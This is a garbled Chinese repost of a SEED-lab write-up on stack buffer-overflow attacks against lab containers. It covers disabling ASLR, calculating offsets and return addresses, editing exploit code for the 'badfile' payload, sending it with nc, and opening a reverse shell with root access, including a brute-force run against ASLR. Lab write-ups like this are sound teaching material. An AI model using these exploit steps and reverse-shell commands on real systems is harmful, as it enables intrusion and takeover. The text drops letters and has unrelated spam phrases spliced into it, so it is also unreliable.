溢出攻击

更新时间:2023-03-27 10:31:18 阅读: 评论:0

而字用法-实习报告题目

溢出攻击
2023年3月27日发(作者:广州机动车)

SEED(2)-缓冲区溢出攻击(Buffer-OverflowAttack)

1.漏洞原理

漏洞代码⽰例:

#include

voidfoo(char*str)

{

charbuffer[12];

strcpy(buffer,str);

}

intmain()

{

char*str="Thisisdefinitelylongerthan12";

foo(str);

return1;

}

当把str的内容copy到buffer中,由于str的长度⼤于12,就会造成缓冲区buffer的溢出,str中多出的部分会存放在缓冲区的上⽅,我们的

⽬的就是将代码植⼊到此处,然后让函数的returnAddress指向我们存放代码的地址A来执⾏code!

A:code的起始地址

Nop:指令为0x90,执⾏该指令时什么都不做,⼀直往下执⾏。(在code与foo()之间填满Nop,便于找到地址A,returnAddress⼀旦指

向其中⼀个Nop,就会执⾏到code的地址A)

2.实验准备

进⼊到/Buffer_Overflow/Labtup/rver-code路径下,执⾏:

$make

$makeinstall

$cd..#进⼊/Labtup⽬录

$dcbuild

$dcup

关闭防范机制:memoryrandomization

$ize_va_space=0

1Attack:GettheParameters(获取参数)

$echohello|nc10.9.0.59090

^C

若执⾏两次打印出的结果⼀致且输出地址为0xf零基础学吹笛子 fffxxxx,则说明memoryrandomization已关闭;

ContainerConsole

rver-1-10.9.0.5|Gotaconnectionfrom10.9.0.1

rver-1-10.9.0.5|Startingstack

rver-1-10.9.0.5|Inputsize:6

rver-1-10.9.0.5|FramePointer(ebp)insidebof():0xffffd108

rver-1-10.9.0.5|Buffer'saddressinsidebof():0xffffd098

rver-1-10.9.0.5|====ReturnedProperly====

rver-1-10.9.0.5|Gotaconnectionfrom10.9.0.1

rver-1-10.9.0.5|Startingstack

rver-1-10.9.0.5|Inputsize:6

rver-1-10.9.0.5|FramePointer(ebp)insidebof():0xffffd108

rver-1-10.9.0.5|Buffer'saddressinsidebof():0xffffd098

rver-1-10.9.0.5|====ReturnedProperly====

$cd/Buffer_Overflow/Files

$

然后利⽤ebp和Bufferaddress计算A的地址(ret)和offt:

ret(A)=0xffffd108+8(min(A)=ebp+8;max(A)=517-len(code))

offt=0xffffd108-0xffffd098+4=116(⼗进制)

修改中ret和offt的值并保退出;然后运⾏:

$

$catbadfile|nc10.9.0.59090

ContainerConsole

rver-1-10.9.0.5|Gotaconnectionfrom10.9.0.1

rver-1-10.9.0.5|Startingstack

rver-1-10.9.0.5|Inputsize:517

rver-1-10.9.0.5|FramePointer(ebp)insidebof():0xffffd428

rver-1-10.9.0.5|Buffer'saddressinsidebof():0xffffd3b8

rver-1-10.9.0.5|(^_^)SUCCESSSUCCESS(^_^)

若出现上⾯'(^_^)SUCCESSSUCCESS(^_^)',说明成功!

GetRevereShell

修改⽂件ret和A的值:

###Puttheshellcodeattheend

content[517-len(shellcode):]=shellcode

#Youneedtofindthecorrectaddress

#Thisshouldbethefirstinstructionyouwanttoreturnto

ret=0xffffd428+40

#Youneedtocalculatetheofft

offt=116

L=4#U4for32-bitaddressand8for64-bitaddress

content[offt:offt+L]=(ret).to_bytes(L,byteorder='little')

##新建⼀个命令⾏窗⼝输⼊$nc-lnv7070开启监听

在三国左慈 另外⼀个窗⼝向rver发送badfile⽂件

$

$catbadfile|nc10.9.0.59090

监听窗⼝输出以下内容,说明成功获取RevereShell;

Listeningon0.0.0.07070

Connectionreceivedon10.9.0.5拈花一笑 51582

root@ec5152748270:/bof

#2A右侧腹部隐痛 ttack:BufferSizeUnknown

$echohello|nc10.9.0.69090

^C

ContainerConsole

rver-2-10.9.0.6|Gotaconnectionfrom10.9.0.1

rver-2-10.9.0.6|Startingstack

rver-2-10.9.0.6|Inputsize:6

rver-2-10.9.0.6|Buffer'saddressinsidebof():0xffffd368

rver-2-10.9.0.6|====ReturnedProperly====

修改⽂件ret和S的值:

S:ref的个数=buffersize/4(⼀个ref为4字节)

ret:BufferAddress+buffersize

###Puttheshellcodeattheendofthebuffer

content[517-len(shellcode):]=shellcode

#Youneedtofindthecorrectaddress

#Thisshouldbethefirstinstructionyouwanttoreturnto

ret=0xffffd368+360

#SpraythebufferwithSnumberofreturnaddress

#YouneedtodecidetheSvalue

S=90

forofftinrange(S):

content[offt*4:offt*4+4]=(ret).to_bytes(4,byteorder='little')

##$

$catbadfile|nc10.9.0.69090

ContainerConsole

rver-2-10.9.0.6|Gotaconnectionfrom10.9.0.1

rver-2-10.9.0.6|Startingstack

rver-2-10.9.0.6|Inputsize:517

rver-2-10.9.0.6|Buffer'saddressinsidebof():0xffffd368

rver-2-10.9.0.6|(^_^)SUCCESSSUCCESS(^_^)

3Attack:64-bitServer

原理:

$echohello|nc10.9.0.79090

^C

ContainerConsole

rver-3-10.9.0.7|Gotaconnectionfrom10.9.0.1

rver-3-10.9.0.7|Startingstack

rver-3-10.9.0.7|Inputsize:517

rver-3-10.9.0.7|FramePointer(rbp)insidebof():0x00007fffffffe2d0

rver-3-10.9.0.7|Buffer'saddressinsidebof():0x00007fffffffe200

修改⽂件中的start,ret和offt;

start=40

offt=ebp-buffer+8

ret=[buffer,buffer+40]范围之间任选⼀个

$

$catbadfile|nc10.9.0.79090

ContainerConsole

rver-3-10.9.0.7|Gotaconnectionfrom10.9.0.1

rver-3-10.9.0.7|Startingstack

rver-3-10.9.0.7|Inputsize:517

rver-3-10.9.0.7|FramePointer(rbp)insidebof():0x00007fffffffe2d0

rver-3-10.9.0.7|Buffer'saddressinsidebof():0x00007fffffffe200

rver-3-10.9.0.7|(^_^)SUCCESSSUCCESS(^_^)

4Attack:Sm舒婷的代表作 allBuffer(64-bit)

$echohello|nc10.9.0.89090

^C

ContainerConsole

rver-4-10.9.0.8|Gotaconnectionfrom10.9.0老师的歌 .1

rver-4-10.9.0.8|Startingstack

rver-4-10.9.0.8|Inputsize:6

rver-4-10.9.0.8|FramePointer(rbp)insidebof():0x00007fffffffe2b0

rver-4-10.9.0.8|Buffer'saddressinsidebof():0x00007fffffffe250

rver-4-10.9.0.8|====ReturnedProperly====

修改⽂件

ret=rbp+1200

$

$catbadfile|nc10.9.0.89090

ContainerConsole

rver-4-10.9.0.8|Gotaconnectionfrom10.9.0.1

rver-4-10.9.0.8|Startingstack

rver-4-10.9.0.8|Inputsize:517

rver-4-10.9.0.8|FramePointer(rbp)insidebof():0x00007fffffffe2b0

rver-4-10.9.0.8|Buffer'saddressinsidebof():0x00007fffffffe250

rver-4-10.9.0.8|(^_^)SUCCESSSUCCESS(^_^)

开启防范机制

$ize_va_space=2

执⾏$nc-lnv7070开启监

Listeningon0.0.0.07070

修改exploit为revershell

新建⼀个命令⾏窗⼝:

$

$chmodu+

$./

我这⾥总共⽤时8分12秒:

8minutesand12condlapd.

Theprogramhasbeenrunning27296timessofar.

8minutesand12condlapd.

Theprogramhasbeenrunning27297timessofar.

成功后监听窗⼝会返回shell

Connectionreceivedon10.9.0.551372

root@ec5152748270:/bof#

本文发布于:2023-03-27 10:31:18,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/zhishi/a/1679884278154989.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:溢出攻击.doc

本文 PDF 下载地址:溢出攻击.pdf

上一篇:张金如
下一篇:返回列表
标签:溢出攻击
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 实用文体写作网旗下知识大全大全栏目是一个全百科类宝库! 优秀范文|法律文书|专利查询|